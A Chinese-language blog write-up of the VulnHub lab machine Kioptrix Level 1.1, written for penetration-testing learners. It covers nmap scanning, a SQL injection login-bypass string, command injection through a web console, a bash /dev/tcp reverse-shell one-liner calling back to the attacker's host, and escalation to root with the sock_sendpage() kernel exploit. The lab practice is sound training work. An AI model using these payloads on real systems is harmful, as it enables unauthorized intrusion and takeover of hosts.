歡迎光臨
我們一直在努力

Vulnhub x Kioptrix: Level 1.1 (#2)

VulnHub是一個面向所有人開放的安全靶場,裡面有很多安全環境,只要下載相關映像檔,在相關虛擬機器上面執行就可以練習相關靶場了。裡面設計了好多關,如果有耐心一定可以到達峰頂。許多考OSCP人員,也會利用Vulnhub靶場進行刷題。我們下載了一個經典漏洞靶場,給大家進行演示,希望讓初學者知道滲透測試的套路,可以更快的成長。

該題從網頁端進行SQL Injection成功登入後,接著透過Command Injection反彈shell,進入到主機後直接使用'sock_sendpage()' Ring0 Privilege Escalation進行提權至Root權限,成功取得flag。

靶機:Kioptrix: Level 1.1 (#2)

首先,先查詢自己本地的IP,可以透過 ifconfig查詢。

eth0 192.168.43.119 這是本地IP ,同時也是攻擊者端

使用nmap -sP,透過Ping方式來查詢該網段其他主機。

找到 192.168.43.171 標的端

透過nmap -A 完整掃描該主機服務,並透過 -p 0-65535掃描該主機 Port

可發現該主機開啟了 22 port、80 port、111 port、443 port、628 port、631 port、3306 port。

訪問該web頁面,發現是個登入框,這邊嘗試用SQL Injection

帳號 admin ' or '1'='1--+

密碼 123

便成功登入。

登入後,可以發現有個Web Console,第一直覺是可以下 Command Injection。這種類型在CTF很常見。

簡單測試下,指令下 ;id

成功顯示 uid為 apache

查看下當前路徑 ;pwd

於是我們直接下命令,反彈一個shell到我們的Kali主機上

;bash -i >&/dev/tcp/192.168.43.119/4444 0>&1

使用nc 監聽 4444 port,並成功取得shell。

使用 uname -a 查詢系統版本,發現可以使用該Linux Kernel 2.4/2.6 - 'sock_sendpage()' Ring0 Privilege Escalation 進行提權。

下載該exp後,直接gcc編譯下,然後賦予權限,後執行。

成功取得root權限

成功得到root後,接著查找root檔案,最後發現在/var/mail目錄下,於是直接cat root,便取得flag。

結束。

讚(0) 打賞
未經允許不得轉載:波波的寂寞世界 » Vulnhub x Kioptrix: Level 1.1 (#2)

波波的寂寞世界

Facebook聯繫我們

覺得文章有用,請作者喝杯咖啡

非常感謝你的打賞,我們將繼續給力更多優質內容,讓我們一起建立更加美好的網路世界!

支付寶掃一掃